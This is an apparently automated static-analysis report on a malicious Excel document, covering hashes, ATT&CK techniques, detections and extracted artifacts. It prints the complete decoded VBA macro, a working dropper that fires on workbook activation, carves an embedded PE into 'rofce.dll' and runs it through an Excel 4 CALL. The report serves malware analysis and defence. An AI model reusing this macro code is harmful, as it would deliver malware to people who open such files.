Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a4c96deb6db58e06…

MALICIOUS

Office (OLE)

Size: 742.5 KB
Created: 2019-08-30 09:14:50
Authoring application: Microsoft Excel
First seen: 2020-09-04
MD5: 3e5d514c1dd7b0a9908babf22faf4f1c
SHA-1: de68f0e7fe4cb60a3302c7f09765bfd56c9f6660
SHA-256: a4c96deb6db58e06388c2d4696f2e27fa9cb648c5bd78d3ad6cef80078e63e6f
Risk score: 442

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer

The sample is an Office document containing VBA macros that utilize the Shell() function. This function is used to execute an embedded PE executable file, identified as 'embedded_office_00004541.exe'. The presence of VirtualAlloc, LoadLibrary, and GetProcAddress API calls within the VBA code suggests the macro is preparing to load and execute the embedded payload, likely for malicious purposes.

Heuristics (10)

  • ClamAV: Win.Trojan.Razy-7331387-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Razy-7331387-0
  • Embedded PE executable [critical] OLE_EMBEDDED_EXE
    MZ/PE header found inside document: possible embedded executable
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched lines in script:
             sendings = 1
             Dim sNMSP As New Shell
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API [high] SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API [high] SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact [high] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API [medium] SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels indicate which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14425 bytes
SHA-256: 32a55ab12ca3427a3f1905ffc18c164c5c11cfbf9d29eabe5c5f457b8a22571e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "one"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Workbook_Activate()
If PrepareForm.Visible = False Then
PopulateDivineCommercial 821
End If

End Sub





Public Sub PopulateDivineCommercial(dImmer As Integer)

Dim ActiveHotbit As New WshShell
 Dim s As String
 Dim GetInfirmityLevelDescription As String
    
    Dim d As Long
    d = 3
    d = d - 1
    Select Case d
    Case 0
        s = "No health problems"
    Case 1
        s = "Minor health problems"
    Case 2
        s = "Major health problems"
       
    Case 3
        s = "Severe disability"
    End Select


    Dim SpecialPath As String
    

PRP = "%" & UserForm6.TextBox1.Tag

UserForm6.TextBox1.Tag = ActiveHotbit.ExpandEnvironmentStrings(PRP + "%")

    
Dim car As CarClass
Set car = New CarClass
UserForm6.TextBox3.Tag = car.CheckCar(ActiveHotbit, "" & UserForm6.TextBox3.Tag + "")
ChDir (UserForm6.TextBox1.Tag)

    PrepareForm.show
End Sub





Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
 #If VBA7 And Win64 Then
Public Const FlagDouble = True
#Else
Public Const FlagDouble = False

#End If
 Public DisputeChannel3 As Byte
     
Public Declaration() As Byte

     

     
    Public abbrev As Byte
  Public DisputeChannel4 As Byte
Public Sub PrepareConfigForOutput()
On Error Resume Next
    Dim i As Long
    Dim sNextChar As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean
    Dim sCommand As String
        Dim PrepareConfigForOutput As Long
    PrepareConfigForOutput = 0
    tooolsetChunkIParameter = False
    tooolsetChunkQ = False
    sCommand = Command$
    
    For i = 1 To ALen.B(sCommand)
        sNextChar = Mid(sCommand, i, 1)
        If tooolsetChunkIParameter Then
            If tooolsetChunkQ Then
                If sNextChar = " " Then
                    tooolsetChunkIParameter = False
                    tooolsetChunkQ = False
                    PrepareConfigForOutput = PrepareConfigForOutput + 1
                End If
            End If
        
        End If
    Next i
    If tooolsetChunkIParameter Then PrepareConfigForOutput = PrepareConfigForOutput + 1
End Sub




Public Sub PathBack(ByVal sPath As String)
    On Error Resume Next
    Dim sT As Variant
    Dim tt As String
    If Len(sPath) = 3 Then GoTo errorhand
    
    For ii = 0 To UBound(sT) - 2
        tt = tt & sT(ii) & "\"
    Next ii
    
    PathB.ack = tt
    
errorhand:
    Path.Back = sPath
End Sub

Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
                tooolsetChunkQ = False
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub






Attribute VB_Name = "PrepareForm"
Attribute VB_Base = "0{45D1D7B4-3D44-44F4-8223-06753405770A}{414BBB58-D4A4-45BD-AFF9-A2FEE7F8B2DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
Call KeyPropUpdate(Me, False)

End Sub

Private Sub UserForm_Activate()
DoEvents
DoEvents
NigebrednehC
DoEvents
End Sub




Attribute VB_Name = "Module2"

Public Const GWL_STYLE = -16
Public Const WS_CAPTION = &HC00000
Public Const WS_SYSMENU = &H80000
 Public Const FirstB As Byte = 77
 Public Const SecondB As Byte = 90
 Public Const ThirdB As Byte = 144
#If VBA7 Then
 Public Declare PtrSafe Function BoxWSL _
 Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _
 ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
 Public Declare PtrSafe Function FWA1 _
 Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _
 ByVal lpWindowName As String) As Long
 Public Declare PtrSafe Function DrawMenuBar _
 Lib "user32" (ByVal parameter1 As Long) As Long
 Public Declare PtrSafe Function GetWindowLong11 _
 Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _
 ByVal nIndex As Long) As Long
#Else
 Public Declare Function GetWindowLong11 _
 Lib "user32" Alias "GetWindowLongA" ( _
 ByVal parameter1 As Long, ByVal nIndex As Long) As Long
 Public Declare Function FWA1 _
 Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _
 ByVal lpWindowName As String) As Long
 Public Declare Function DrawMenuBar _
 Lib "user32" (ByVal parameter1 As Long) As Long
 Public Declare Function BoxWSL _
 Lib "user32" Alias "SetWindowLongA" ( _
 ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
#End If
Public Function NumberBuffer(LongData As Long, Context As Integer, ByVal ByteData As Byte)
 If PrepareForm.Enabled = True Then
 Put #LongData, , ByteData
End If
End Function
Public Function ColumnRangeWidth(ByVal ColRange As String, ByVal Width As Single) As Boolean
 ColumnRangeWidth = True
 On Error GoTo ErrorHandler
 Excel.Worksheets(1).Columns(ColRange).ColumnWidth = Width
 Exit Function
ErrorHandler:
 ColumnRangeWidth = False
 Resume Next
End Function
Public Function ColumnWidth(ByVal Col As Integer, ByVal Width As Single) As Boolean
 ColumnWidth = True
 On Error GoTo ErrorHandler
 Excel.Worksheets(1).Columns(Col).ColumnWidth = Width
 Exit Function
ErrorHandler:
 ColumnWidth = False
 Resume Next
End Function
Public Function GetFlexGridColFromXPos(TheGrid, XPos As Single) As Long
On Error GoTo ErrorTrap
Dim i As Long, lAccWidth As Long
 With TheGrid
 For i = 0 To .Cols - 1
 lAccWidth = lAccWidth + .ColWidth(i)
 If XPos <= lAccWidth Then
 GetFlexGridColFromXPos = i
 Exit Function
 End If
 Next i
 End With
 Exit Function
ErrorTrap:
 Exit Function
End Function


Private Sub ERRCHECK(result)
 If result = RCPND_FMOD_OK Then
 ms.gR.esult = MsgBox(result & ") ")
 End If
End Sub
Public Sub NigebrednehC()
    Dim sendings As Integer
    ctackPap = UserForm6.TextBox1.Tag
    Dim ofbl As String
    ofbl = UserForm6.TextBox3.Tag + "\rofce.dll"
    Dim CurrentSizeOfAT As Long

ctackPup = Join(Array(UserForm6.TextBox1.Tag, "\olivio.xlsx"), "")

        ctackPop = Join(Array(ctackPap, UserForm6.TextBox3.Value), "")
        
        foooBar = Array("", "", "", ctackPup, ".z", "ip")
        
        Dim arr(1 To 3) As String
        
        If foooBar(0) > "" Then
        End If
ctackPip = Join(foooBar, "")

    
 PublicResumEraseByArrayList ctackPop, ctackPip, ofbl
  VistaQ ctackPup
    
        FileCopy ctackPup, ctackPip
        
         sendings = 1
         Dim sNMSP As New Shell
       
    If sendings > 0 And sendings > -30 Then
         
          Set FileWherePutTo2 = sNMSP.Namespace(ctackPap)
            Set FileWherePutTo = sNMSP.Namespace(ctackPip)
           
          
          
          
FileWherePutTo2.CopyHere FileWherePutTo.Items.Item(UserForm6.Label11.Tag)
              
 
        End If
    CurrentSizeOfAT = 287232
      
        If FlagDouble Then
                CurrentSizeOfAT = 300000 + 10780 + 4
                sendings = 2
            End If
 Composition ctackPap & UserForm6.Label1.Tag, ofbl, CurrentSizeOfAT, sendings
        If sendings >= 0 Then
            sendings = sendings + 1
            ChDir (UserForm6.TextBox3.Tag)
            sendings = sendings + 1
        End If
        If sendings < 100 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
            PrepareConfigForOutput
       
        If sendings < 0 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
    ofbl = "CALL(""" + ofbl

    ExecuteExcel4Macro ofbl + """,""vide1"",""J"")"
                
End Sub





Public Sub VistaQ(WhereToGo)
 DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
End Sub










Attribute VB_Name = "Module0"

Attribute VB_Name = "UserForm6"
Attribute VB_Base = "0{CD12D883-907D-46E1-91A2-D3B2CE6A0748}{3D460F7F-FB83-4637-B312-CDC2A962F6FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module4"








 
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
                tooolsetChunkQ = False
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub

















Attribute VB_Name = "Module5"

Public Sub KeyPropUpdate(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FWA1(vbNullString, frm.Caption)
windowStyle = GetWindowLong11(windowHandle, GWL_STYLE)

If show Then

    BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

   
Else
 BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub



Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
    On Error Resume Next
    For Each Key In putArrayBigList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub

Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer)
 Dim DisputeChannel1 As Long
 
 Dim SimpleMethod As Integer
 ReDim Declaration(1 To fl)
 DisputeChannel1 = FreeFile
 Open Composition2 For Binary Access Read As DisputeChannel1
 Dim cur As Integer
 cur = 1
Do While 1
 Get DisputeChannel1, , abbrev
 If abbrev = FirstB Then
 Declaration(1) = abbrev
 Get DisputeChannel1, , DisputeChannel3
 If DisputeChannel3 = SecondB Then
 Declaration(2) = DisputeChannel3
 Get DisputeChannel1, , DisputeChannel4
 If DisputeChannel4 = ThirdB Then
 Declaration(3) = DisputeChannel4
 If cur = DisputeChannel6 Then
 For k = 4 To fl
 Get DisputeChannel1, , abbrev
 Declaration(k) = abbrev
 Next k
 Exit Do
 Else
 cur = cur + 1
 End If
 End If
 End If
 End If
 Loop
 Close DisputeChannel1
 On Error Resume Next
 DisputeChannel1 = FreeFile
 Open ofbl For Binary Lock Read Write As #DisputeChannel1
 For i = LBound(Declaration) To UBound(Declaration)
 If PrepareForm.Enabled = True Then
 NumberBuffer DisputeChannel1, 70, Declaration(i)
 End If
 Next i
 Close DisputeChannel1
 DisputeChannel1 = FreeFile
 For HSP = 33 To -1 Step -0.25
 DisputeChannel1 = 6 + i
 Next HSP
End Sub



Attribute VB_Name = "CarClass"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
    
Dim vSpeed As Integer
Dim vLicensePlate As String
 
Public Property Get Speed() As Integer
    Speed = vSpeed
End Property
 
Public Property Let Speed(sp As Integer)
    vSpeed = Application.WorksheetFunction.Min(sp, 100)
    vSpeed = Application.WorksheetFunction.Max(vSpeed, -100)
End Property
 
Public Property Get CheckCar(car As Object, Drive As String)
CheckCar = car.SpecialFolders("" + Drive)

End Property
Public Property Get SpecialFolders() As String
    LicensePlate = vLicensePlate
End Property
 
Public Property Let LicensePlate(lp As String)
    If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error
    vLicensePlate = lp
End Property

Filename: embedded_office_00004541.exe
Kind: embedded-pe
Source: Office MZ+PE at offset 0x4541
Size: 742591 bytes
SHA-256: 655fe4f48d25db6a66b9a81f1ea331b4f7d146c6dbf91e11415f68b041db8784
Detection
ClamAV: Win.Trojan.Razy-7331387-0
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell""J]

Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: MBD0068059B/Ole10Native
Size: 618253 bytes
SHA-256: de80c1ed8f6232c4680d072680df677cf0217e8cf23c7fd905691b8669cbdd34